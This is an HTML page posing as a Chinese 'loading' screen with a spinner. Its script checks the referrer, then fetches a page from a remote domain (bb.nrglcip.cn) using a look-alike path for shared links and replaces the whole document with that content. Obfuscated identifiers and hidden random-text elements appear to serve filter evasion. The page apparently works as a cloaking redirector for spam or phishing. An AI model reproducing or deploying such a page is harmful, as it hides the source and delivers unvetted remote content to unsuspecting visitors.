<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .AVlOTY {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .AVlOTY .AHOIRSQNpt {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .AVlOTY .content {
            line-height: 50px;
            text-align: center
        }

        .AVlOTY .img {
            width: 100%
        }

        .AVlOTY .je9fKuPG {
            text-align: center
        }

        .AVlOTY .je9fKuPG span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .AVlOTY .je9fKuPG span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .AVlOTY .je9fKuPG span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .AVlOTY .je9fKuPG span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .AVlOTY .je9fKuPG span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .AVlOTY .je9fKuPG span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .AVlOTY .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function iidBUQQ18XqE(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var WohKd = iidBUQQ18XqE('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ WohKd +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ WohKd +".html?a=share";
		}
		
        EsEM1Uk=url+"#"+new Date().getTime();
        EsEM1Uk && function() {
            $.get(EsEM1Uk, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<img  src='' style='display:none'>
<p  style='display:none'>cPDoWYrODB0hf8LSG93uH8pqb2HuK2m8CJbKfwF</p>
<a  href='#' style='display:none'>ZJBAFCH3nHqkcxhNZvSWP</a>
<b style='display:none' >jewgfiXpEBOQ</b><div class="AVlOTY">
    <div class="AHOIRSQNpt">
        <div class="je9fKuPG">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<li style='display:none' >YAMzZqWlQQ7G99NIlN1A23iAwL1E2i7vUHyMm5haIjwzSBFsNDGCIzTlKVpSZdhgdIo</li>
<li style='display:none' >YAMzZqWlQQ7G99NIlN1A23iAwL1E2i7vUHyMm5haIjwzSBFsNDGCIzTlKVpSZdhgdIo</li>
<ul style='display:none' >lKqlTqotAjnYjIfxCGrOk7N4OHimO3cY67opYGYi1YDEOGsBIKGfiyFA3imS3Bgpk66wZFYeRi8iKRyCRrBCw3anpQWsWlunk35n</ul>
<b style='display:none' >FrRZDDuUvCggg4BOuTAupyxph1TSLZKJjRtaV0gh5WFS2Q3iwkMsTXJo</b></body>
</html>